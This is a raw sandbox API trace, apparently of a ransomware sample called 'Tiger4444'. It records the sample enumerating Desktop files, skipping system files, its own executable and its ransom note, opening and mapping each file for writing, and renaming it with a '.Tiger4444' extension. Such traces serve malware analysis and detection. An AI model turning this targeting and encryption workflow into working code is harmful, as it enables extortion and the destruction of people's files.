[0049.634] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.634] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14108735608) returned 1 [0049.634] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=27746) returned 1 [0049.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0049.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0049.634] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f70, lpName=0x0) returned 0x2c8 [0049.634] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f70) returned 0xbe0000 [0049.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0049.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0049.636] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14108940554) returned 1 [0049.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0049.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0049.636] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.637] CloseHandle (hObject=0x2c8) returned 1 [0049.637] CloseHandle (hObject=0x260) returned 1 [0049.637] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4GlM138d-HV-Uq.m4a.Tiger4444") returned 59 [0049.637] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4GlM138d-HV-Uq.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\4glm138d-hv-uq.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4GlM138d-HV-Uq.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\4glm138d-hv-uq.m4a.tiger4444"), dwFlags=0x1) returned 1 [0049.638] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63bc4de0, ftCreationTime.dwHighDateTime=0x1d4c58e, ftLastAccessTime.dwLowDateTime=0xfb985c30, ftLastAccessTime.dwHighDateTime=0x1d4c92b, ftLastWriteTime.dwLowDateTime=0xfb985c30, ftLastWriteTime.dwHighDateTime=0x1d4c92b, nFileSizeHigh=0x0, nFileSizeLow=0x10cf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4vxTT7ZgV5J.jpg", cAlternateFileName="4VXTT7~1.JPG")) returned 1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="Tiger4444.exe") returned -1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2=".") returned 1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="..") returned 1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="windows") returned -1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="bootmgr") returned -1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="pagefile.sys") returned -1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="boot") returned -1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="ids.txt") returned -1 [0049.638] lstrcmpiW (lpString1="4vxTT7ZgV5J.jpg", lpString2="NTUSER.DAT") returned -1 [0049.638] lstrcpyW (in: lpString1=0x30aeae6, lpString2="4vxTT7ZgV5J.jpg" | out: lpString1="4vxTT7ZgV5J.jpg") returned="4vxTT7ZgV5J.jpg" [0049.638] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4vxTT7ZgV5J.jpg", dwFileAttributes=0x0) returned 1 [0049.638] lstrlenW (lpString="4vxTT7ZgV5J.jpg") returned 15 [0049.638] lstrlenW (lpString="Tiger4444") returned 9 [0049.638] lstrcmpiW (lpString1="ZgV5J.jpg", lpString2="Tiger4444") returned 1 [0049.638] lstrlenW (lpString=".dll") returned 4 [0049.638] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.638] lstrlenW (lpString=".lnk") returned 4 [0049.638] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0049.638] lstrlenW (lpString=".ini") returned 4 [0049.638] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0049.638] lstrlenW (lpString=".sys") returned 4 [0049.638] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0049.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4vxTT7ZgV5J.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\4vxtt7zgv5j.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.638] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.638] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14109157126) returned 1 [0049.639] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=68857) returned 1 [0049.639] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0049.639] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0049.639] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11000, lpName=0x0) returned 0x2c8 [0049.639] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0xbe0000 [0049.640] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.640] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0049.640] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.640] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.640] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.640] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.640] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.640] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0049.640] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14109352645) returned 1 [0049.640] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0049.640] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0049.641] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.641] CloseHandle (hObject=0x2c8) returned 1 [0049.641] CloseHandle (hObject=0x260) returned 1 [0049.642] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4vxTT7ZgV5J.jpg.Tiger4444") returned 56 [0049.642] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4vxTT7ZgV5J.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\4vxtt7zgv5j.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4vxTT7ZgV5J.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\4vxtt7zgv5j.jpg.tiger4444"), dwFlags=0x1) returned 1 [0049.642] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74fee7a0, ftCreationTime.dwHighDateTime=0x1d4d148, ftLastAccessTime.dwLowDateTime=0x617aa3a0, ftLastAccessTime.dwHighDateTime=0x1d4cf44, ftLastWriteTime.dwLowDateTime=0x617aa3a0, ftLastWriteTime.dwHighDateTime=0x1d4cf44, nFileSizeHigh=0x0, nFileSizeLow=0x5272, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A6pxU.ots", cAlternateFileName="")) returned 1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="Tiger4444.exe") returned -1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2=".") returned 1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="..") returned 1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="windows") returned -1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="bootmgr") returned -1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="pagefile.sys") returned -1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="boot") returned -1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="ids.txt") returned -1 [0049.642] lstrcmpiW (lpString1="A6pxU.ots", lpString2="NTUSER.DAT") returned -1 [0049.642] lstrcpyW (in: lpString1=0x30aeae6, lpString2="A6pxU.ots" | out: lpString1="A6pxU.ots") returned="A6pxU.ots" [0049.642] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\A6pxU.ots", dwFileAttributes=0x0) returned 1 [0049.643] lstrlenW (lpString="A6pxU.ots") returned 9 [0049.643] lstrlenW (lpString="Tiger4444") returned 9 [0049.643] lstrcmpiW (lpString1="A6pxU.ots", lpString2="Tiger4444") returned -1 [0049.643] lstrlenW (lpString=".dll") returned 4 [0049.643] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0049.643] lstrlenW (lpString=".lnk") returned 4 [0049.643] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0049.643] lstrlenW (lpString=".ini") returned 4 [0049.643] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0049.643] lstrlenW (lpString=".sys") returned 4 [0049.643] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0049.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\A6pxU.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\a6pxu.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.643] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.643] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14109608246) returned 1 [0049.643] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=21106) returned 1 [0049.643] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0049.643] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0049.643] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5580, lpName=0x0) returned 0x2c8 [0049.643] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5580) returned 0xbe0000 [0049.644] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.644] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0049.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.644] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.644] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0049.644] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14109731089) returned 1 [0049.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0049.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0049.644] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.645] CloseHandle (hObject=0x2c8) returned 1 [0049.645] CloseHandle (hObject=0x260) returned 1 [0049.647] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\A6pxU.ots.Tiger4444") returned 50 [0049.647] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\A6pxU.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\a6pxu.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\A6pxU.ots.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\a6pxu.ots.tiger4444"), dwFlags=0x1) returned 1 [0049.647] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbede08b0, ftCreationTime.dwHighDateTime=0x1d4d08f, ftLastAccessTime.dwLowDateTime=0xb4c33910, ftLastAccessTime.dwHighDateTime=0x1d4c76e, ftLastWriteTime.dwLowDateTime=0xb4c33910, ftLastWriteTime.dwHighDateTime=0x1d4c76e, nFileSizeHigh=0x0, nFileSizeLow=0x7b79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DnM675.gif", cAlternateFileName="")) returned 1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="Tiger4444.exe") returned -1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2=".") returned 1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="..") returned 1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="windows") returned -1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="bootmgr") returned 1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="pagefile.sys") returned -1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="boot") returned 1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="ids.txt") returned -1 [0049.648] lstrcmpiW (lpString1="DnM675.gif", lpString2="NTUSER.DAT") returned -1 [0049.648] lstrcpyW (in: lpString1=0x30aeae6, lpString2="DnM675.gif" | out: lpString1="DnM675.gif") returned="DnM675.gif" [0049.648] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\DnM675.gif", dwFileAttributes=0x0) returned 1 [0049.648] lstrlenW (lpString="DnM675.gif") returned 10 [0049.648] lstrlenW (lpString="Tiger4444") returned 9 [0049.648] lstrcmpiW (lpString1="nM675.gif", lpString2="Tiger4444") returned -1 [0049.648] lstrlenW (lpString=".dll") returned 4 [0049.648] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0049.648] lstrlenW (lpString=".lnk") returned 4 [0049.648] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0049.648] lstrlenW (lpString=".ini") returned 4 [0049.648] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0049.648] lstrlenW (lpString=".sys") returned 4 [0049.648] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0049.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\DnM675.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\dnm675.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.648] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.648] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14110147780) returned 1 [0049.648] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=31609) returned 1 [0049.648] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0049.648] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0049.649] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e80, lpName=0x0) returned 0x2c8 [0049.649] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e80) returned 0xbe0000 [0049.649] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.649] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0049.649] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.649] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.649] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.650] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.650] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.650] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0049.650] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14110282280) returned 1 [0049.650] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0049.650] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0049.650] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.650] CloseHandle (hObject=0x2c8) returned 1 [0049.650] CloseHandle (hObject=0x260) returned 1 [0049.651] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\DnM675.gif.Tiger4444") returned 51 [0049.651] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\DnM675.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\dnm675.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\DnM675.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\dnm675.gif.tiger4444"), dwFlags=0x1) returned 1 [0049.651] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9e7f100, ftCreationTime.dwHighDateTime=0x1d4ce09, ftLastAccessTime.dwLowDateTime=0x255c7530, ftLastAccessTime.dwHighDateTime=0x1d4c867, ftLastWriteTime.dwLowDateTime=0x255c7530, ftLastWriteTime.dwHighDateTime=0x1d4c867, nFileSizeHigh=0x0, nFileSizeLow=0x94c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ItS9YL1.mp4", cAlternateFileName="")) returned 1 [0049.651] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.651] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.651] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="Tiger4444.exe") returned -1 [0049.651] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2=".") returned 1 [0049.651] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="..") returned 1 [0049.770] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="windows") returned -1 [0049.770] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="bootmgr") returned 1 [0049.770] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="pagefile.sys") returned -1 [0049.770] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="boot") returned 1 [0049.770] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="ids.txt") returned 1 [0049.771] lstrcmpiW (lpString1="ItS9YL1.mp4", lpString2="NTUSER.DAT") returned -1 [0049.771] lstrcpyW (in: lpString1=0x30aeae6, lpString2="ItS9YL1.mp4" | out: lpString1="ItS9YL1.mp4") returned="ItS9YL1.mp4" [0049.771] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ItS9YL1.mp4", dwFileAttributes=0x0) returned 1 [0049.773] lstrlenW (lpString="ItS9YL1.mp4") returned 11 [0049.773] lstrlenW (lpString="Tiger4444") returned 9 [0049.773] lstrcmpiW (lpString1="S9YL1.mp4", lpString2="Tiger4444") returned -1 [0049.773] lstrlenW (lpString=".dll") returned 4 [0049.773] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0049.773] lstrlenW (lpString=".lnk") returned 4 [0049.773] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0049.773] lstrlenW (lpString=".ini") returned 4 [0049.773] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0049.773] lstrlenW (lpString=".sys") returned 4 [0049.773] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0049.773] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ItS9YL1.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\its9yl1.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.773] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.773] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14122640658) returned 1 [0049.773] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=38080) returned 1 [0049.773] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0049.773] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0049.773] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x97c0, lpName=0x0) returned 0x2c8 [0049.774] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x97c0) returned 0xbe0000 [0049.775] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.775] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0049.775] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.775] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0049.775] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.775] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0049.775] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.776] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0049.776] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14122865540) returned 1 [0049.776] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0049.776] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0049.776] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.776] CloseHandle (hObject=0x2c8) returned 1 [0049.776] CloseHandle (hObject=0x260) returned 1 [0049.777] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ItS9YL1.mp4.Tiger4444") returned 52 [0049.777] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ItS9YL1.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\its9yl1.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ItS9YL1.mp4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\its9yl1.mp4.tiger4444"), dwFlags=0x1) returned 1 [0049.778] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c9f3430, ftCreationTime.dwHighDateTime=0x1d4c920, ftLastAccessTime.dwLowDateTime=0xaa4e39d0, ftLastAccessTime.dwHighDateTime=0x1d4cba6, ftLastWriteTime.dwLowDateTime=0xaa4e39d0, ftLastWriteTime.dwHighDateTime=0x1d4cba6, nFileSizeHigh=0x0, nFileSizeLow=0x8fa8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IwTT.png", cAlternateFileName="")) returned 1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="Tiger4444.exe") returned -1 [0049.778] 